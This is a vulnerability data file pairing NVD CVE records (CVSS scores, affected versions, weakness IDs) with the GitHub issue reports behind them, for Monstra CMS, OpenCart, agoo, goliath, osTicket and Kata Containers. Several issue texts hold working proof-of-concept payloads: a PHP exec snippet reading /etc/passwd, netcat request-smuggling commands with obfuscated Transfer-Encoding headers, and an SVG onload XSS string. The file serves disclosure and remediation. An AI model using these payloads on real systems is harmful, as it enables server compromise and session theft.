{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/464" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/464" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "A2226D9F-8476-4F0F-9DE3-21A8FE290533", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/monstra-cms/monstra/issues/464
[ "Exploit", "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
**Describe the bug** An attacker could insert any executable code through php via Theme Module to execution command in the server **To Reproduce** - Log into the panel. - Go to "/admin/index.php?id=themes&action=edit_chunk" - Click edit - Insert payload ``` <?php exec('cat /etc/passwd 2>&1', $output); ?> <?php print_r($output); ?> ``` - Go to index view ![Screenshot_2020-05-23_00-52-311727905db1c67506.png](https://s3.anh.im/2020/05/23/Screenshot_2020-05-23_00-52-311727905db1c67506.png) ![Screenshot_2020-05-23_01-03-263c0e76697d8d8324.png](https://s3.anh.im/2020/05/23/Screenshot_2020-05-23_01-03-263c0e76697d8d8324.png)
Remote Code Execution via Theme module
https://api.github.com/repos/monstra-cms/monstra/issues/464/comments
1
2020-05-22T18:06:25Z
2024-09-14T08:18:06Z
https://github.com/monstra-cms/monstra/issues/464
623,393,091
464
1,264
CVE-2020-13980
2020-06-09T14:15:10.217
OpenCart 3.0.3.3 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section because of a lack of entity encoding. NOTE: this issue exists because of an incomplete fix for CVE-2020-10596. The vendor states "this is not a massive issue as you are still required to be logged into the admin.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/opencart/opencart/issues/7974" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/opencart/opencart/issues/7974" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opencart:opencart:3.0.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "F0CB49BB-ED76-4815-9DA0-12B76DDAE975", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/opencart/opencart/issues/7974
[ "Exploit", "Third Party Advisory" ]
github.com
[ "opencart", "opencart" ]
Spam
Store XSS Vulnerability in Opencart 3.0.3.3 - Upload Images
https://api.github.com/repos/opencart/opencart/issues/7974/comments
5
2020-05-31T16:35:45Z
2021-08-03T11:05:07Z
https://github.com/opencart/opencart/issues/7974
627,998,047
7,974
1,265
CVE-2020-7670
2020-06-10T16:15:10.540
agoo prior to 2.14.0 allows request smuggling attacks where agoo is used as a backend and a frontend proxy also being vulnerable. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Content-Length and Transfer encoding header parsing. It is possible to conduct HTTP request smuggling attacks where `agoo` is used as part of a chain of backend servers due to insufficient `Content-Length` and `Transfer Encoding` parsing.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": null, "url": "https://github.com/ohler55/agoo/commit/23d03535cf7b50d679a60a953a0cae9519a4a130" }, { "source": "report@snyk.io", "tags": null, "url": "https://github.com/ohler55/agoo/issues/88" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-RUBY-AGOO-569137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/ohler55/agoo/commit/23d03535cf7b50d679a60a953a0cae9519a4a130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/ohler55/agoo/issues/88" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-RUBY-AGOO-569137" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ohler:agoo:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "6A41F130-9592-48D6-9B78-86D688B56D5A", "versionEndExcluding": null, "versionEndIncluding": "2.12.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "444" ]
444
https://github.com/ohler55/agoo/issues/88
null
github.com
[ "ohler55", "agoo" ]
Testbed used to verify the vulnerability: https://github.com/ohler55/agoo#rack The following requests can be send via command line (tested on ubuntu) to reproduce the behaviour ## Double Content Length Headers printf 'GET /hello HTTP/1.1\r\n'\ 'Content-Length: 47\r\n'\ 'Content-Length: 0\r\n'\ 'Host: 127.0.0.1\r\n'\ '\r\n'\ 'GET /smuggle HTTP/1.1\r\n'\ 'Host: 127.0.0.1\r\n'\ '\r\n' | nc 127.0.0.1 80 ### Invalid Transfer Encoding Header printf 'POST / HTTP/1.1\r\n'\ 'Host:localhost\r\n'\ 'tRANSFER-ENCODING: chunked\r\n'\ 'Content-Type: application/x-www-form-urlencoded\r\n'\ '\r\n'\ '0\r\n'\ '\r\n'\ | nc 127.0.0.1 80 ## Agoo allows multiple malformed variations of the Transfer Encoding header A request with Content Length and malformed Transfer encoding headers that can be sent to a backend server and conduct CL:TE attacks. (https://memn0ps.github.io/2019/09/13/HTTP-Request-Smuggling-CL-TE.html) POST /hello HTTP/1.1 Host: 127.0.0.1:6464 Content-Type: application/x-www-form-urlencoded Content-Length: 6 Transfer-Encoding : chunked 0 X In the above example, the request is sent with the Transfer encoding header having extra spaces (Transfer-Encoding : chunked). This is in violation of RFC 7230. Agoo was also found to allow multiple variations of bad transfer encoding headers including CRLF characters, Fake Transfer encoding etc. (See TE.TE behavior: obfuscating the TE header section: https://portswigger.net/web-security/request-smuggling) Some other examples that is allowed: Transfer-Encoding: chunk Transfer-Encoding: ch–nked Transfer-Encoding:ÿchunked Transfer-Encoding:chunked tRANSFER-ENCODING: chunked [space here]Transfer-Encoding: chunked Transfer-Encoding: chunked Transfer-Encoding:chunked Transfer-Encoding: "chunked" Transfer-Encoding : chunked Transfer-Encoding: chunked The above is proof of concept which just demonstrates the behaviour. Depending on how Algoo will be used as part of a chain of servers, this could result in a successful request smuggling attack. I am happy to provide more information regarding a successful attack. Remediation The best solution to remediate this vulnerability is to do the following: - Disallow requests with double content lengths headers - Ensure malformed Transfer encoding headers are not allowed. This can be done via rejecting the request and sending a 400 back to the HTTP client - As per RFC 7230, (https://tools.ietf.org/html/rfc7230#section-3.3.3) When requests with both Content-Length and Transfer encoding header is sent, the Content-Length header should be ignored Remediation for the following open source projects can be used as a reference. The above points were taken from that. • https://github.com/benoitc/gunicorn/issues/2176 • https://github.com/netty/netty/issues/9571 • https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes
Protect against smuggling attacks
https://api.github.com/repos/ohler55/agoo/issues/88/comments
3
2020-05-16T00:01:28Z
2020-11-12T16:09:05Z
https://github.com/ohler55/agoo/issues/88
619,332,166
88
1,266
CVE-2020-7671
2020-06-10T16:15:10.587
goliath through 1.0.6 allows request smuggling attacks where goliath is used as a backend and a frontend proxy also being vulnerable. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TE:CL smuggling attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": null, "url": "https://github.com/postrank-labs/goliath/issues/351%2C" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-RUBY-GOLIATH-569136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/postrank-labs/goliath/issues/351%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-RUBY-GOLIATH-569136" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:goliath_project:goliath:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "079332CF-A488-425D-A4C7-3804B6EBE665", "versionEndExcluding": null, "versionEndIncluding": "1.0.6", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "444" ]
444
https://github.com/postrank-labs/goliath/issues/351%2C
null
github.com
[ "postrank-labs", "goliath" ]
Posting it here for community patches after talking with the maintainers privately. Issue: Goliath doesn't prevent Request Smuggling attacks 1. Goliath allows requests with multiple content-lengths. When sent a request such as the below, the first content-length header is ignored and the second content-length header is prioritized. Since the second content-length was set to zero, the backend will expect no request body and the /smuggledreq request is treated as another pipelined request. ``` GET / HTTP/1.1 Content-Length: 46 Content-Length: 0 Host: 127.0.0.1 GET /smuggledreq HTTP/1.1 Host: 127.0.0.1 ``` ``` HTTP/1.1 200 OK Content-Length: 11 Server: Goliath Date: Tue, 02 Jun 2020 19:45:59 GMT hello worldHTTP/1.1 200 OK Content-Length: 11 Server: Goliath Date: Tue, 02 Jun 2020 19:45:59 GMT hello world ``` 2. Goliath allows multiple malformed variations of the Transfer Encoding header. Depending on how Goliath will be used as part of a chain of servers, this could result in a successful request smuggling attack. ``` POST / HTTP/1.1 Host: 127.0.0.1:9000 Content-Type: application/x-www-form-urlencoded Content-Length: 8 tRANSFER-ENCODING: chunked 0 X ``` Other examples: ``` Transfer-Encoding: chunked Transfer-Encoding:chunked Transfer-Encoding: ch–nked tRANSFER-ENCODING: chunked ``` **How to fix:** **Prioritize Transfer-Encoding over Content-Length** Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: When a request with both a Transfer-Encoding: chunked header and Content-length is received, the transfer-encoding header should be prioritized over Content-Length. This is referenced in RFC 7230 Section 3.3.3#3. **Disallow requests with Double Content-Length** Remediation: This remediation will prevent CL:CL attacks Details: As mentioned in RFC 7230 Section 3.3.3#4, if a HTTP request is received with multiple content-length headers with different length values, this should be responded with a HTTP 400 response. **Disallow malformed Transfer encoding headers** Remediation: This remediation will prevent TE:TE attacks. Details: If both a frontend and backend prioritizes the Transfer-Encoding header, it could allow smuggling attacks where an attacker inserts two Transfer-Encoding headers, one which would be ignored by the frontend and is processed by the backend and vice versa. As such, the following type of header variations should be rejected. More examples of header variations can be seen here:https://portswigger.net/web-security/request-smuggling **Disallow requests with both Content-length and Transfer encoding** Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: This can be seen as a better alternative to “Prioritize Transfer-Encoding over Content-Length” solution. Runtime platforms such as Node.js have used this solution to remediate against request smuggling where any requests with both headers are returned with a HTTP 400 response.
HTTP Request Smuggling Hardening
https://api.github.com/repos/postrank-labs/goliath/issues/351/comments
0
2020-06-02T19:56:15Z
2020-11-23T14:21:05Z
https://github.com/postrank-labs/goliath/issues/351
629,473,498
351
1,267
CVE-2020-14012
2020-06-10T18:15:10.890
scp/categories.php in osTicket 1.14.2 allows XSS via a Knowledgebase Category Name or Category Description. The attacker must be an Agent.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/osTicket/osTicket/issues/5514" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/osTicket/osTicket/issues/5514" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:enhancesoft:osticket:1.14.2:*:*:*:*:*:*:*", "matchCriteriaId": "81B1474A-11DC-489E-9A4A-F57F4110D087", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/osTicket/osTicket/issues/5514
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "osTicket", "osTicket" ]
Description: A authenticated malicious user can take advantage of a Reflected XSS vulnerability in the "Knowledgebase" feature. This was can be bypassed by using HTML event handlers, such as "ontoggle". OS: firefox Steps to Reproduce: 1. Log into the panel OsTicket 2. Go to "/osticket/scp/kb.php" 3. Go to "/osticket/scp/categories.php" 4. Click "Add New Category" 5. Insert payload to Category Name or Category Description: `"><svg/onload=alert(document.domain)>` **Expected behavior: [What you expected to happen]** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![111](https://user-images.githubusercontent.com/35331850/82547492-09c33d80-9b84-11ea-9367-3729e6ad0f4e.PNG)
Cross Site Scripting Vulnerability on "Knowledgebase" feature in OsTicket
https://api.github.com/repos/osTicket/osTicket/issues/5514/comments
3
2020-05-21T10:01:21Z
2020-06-16T21:52:33Z
https://github.com/osTicket/osTicket/issues/5514
622,390,539
5,514
1,268
CVE-2020-2023
2020-06-10T18:15:11.280
Kata Containers doesn't restrict containers from accessing the guest's root filesystem device. Malicious containers can exploit this to gain code execution on the guest and masquerade as the kata-agent. This issue affects Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; and Kata Containers 1.9 and earlier versions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.8, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2, "impactScore": 1.4, "source": "psirt@paloaltonetworks.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2, "impactScore": 3.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "psirt@paloaltonetworks.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/agent/issues/791" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch" ], "url": "https://github.com/kata-containers/agent/pull/792" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/issues/2488" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2477" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2487" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.10.5" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.11.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/agent/issues/791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/kata-containers/agent/pull/792" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/issues/2488" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2477" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2487" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.10.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.11.1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "0AB886E3-03F3-43FA-AE4F-092FA6246A31", "versionEndExcluding": null, "versionEndIncluding": "1.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "FD1E8DE9-C5B6-4DA0-A5B2-A6C3B38DD2B6", "versionEndExcluding": "1.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.10", "vulnerable": true }, { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "1358CC70-876F-4CA6-AC86-551883794212", "versionEndExcluding": "1.11.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.11", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "250" ]
250
https://github.com/kata-containers/agent/issues/791
[ "Third Party Advisory" ]
github.com
[ "kata-containers", "agent" ]
Explicitly deny any access to the nvdimm root partition by adding the nvdimm device to the device cgroup.
Explicitly deny any access to the nvdimm root partition
https://api.github.com/repos/kata-containers/agent/issues/791/comments
0
2020-06-03T15:33:02Z
2020-06-03T20:30:09Z
https://github.com/kata-containers/agent/issues/791
630,096,691
791
1,269
CVE-2020-2023
2020-06-10T18:15:11.280
Kata Containers doesn't restrict containers from accessing the guest's root filesystem device. Malicious containers can exploit this to gain code execution on the guest and masquerade as the kata-agent. This issue affects Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; and Kata Containers 1.9 and earlier versions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.8, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2, "impactScore": 1.4, "source": "psirt@paloaltonetworks.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2, "impactScore": 3.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "psirt@paloaltonetworks.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/agent/issues/791" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch" ], "url": "https://github.com/kata-containers/agent/pull/792" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/issues/2488" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2477" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2487" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.10.5" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.11.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/agent/issues/791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/kata-containers/agent/pull/792" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/issues/2488" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2477" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2487" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.10.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.11.1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "0AB886E3-03F3-43FA-AE4F-092FA6246A31", "versionEndExcluding": null, "versionEndIncluding": "1.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "FD1E8DE9-C5B6-4DA0-A5B2-A6C3B38DD2B6", "versionEndExcluding": "1.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.10", "vulnerable": true }, { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "1358CC70-876F-4CA6-AC86-551883794212", "versionEndExcluding": "1.11.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.11", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "250" ]
250
https://github.com/kata-containers/runtime/issues/2488
[ "Patch", "Third Party Advisory" ]
github.com
[ "kata-containers", "runtime" ]
CLH recently introduced a new stable branch `stable/v0.5.x` [here](https://github.com/cloud-hypervisor/cloud-hypervisor/tree/stable/v0.5.x), and it is advised to use this branch. This branch includes updates that allow the root file system to be mounted as read-only.
clh: update CLH to stable/v0.5.x
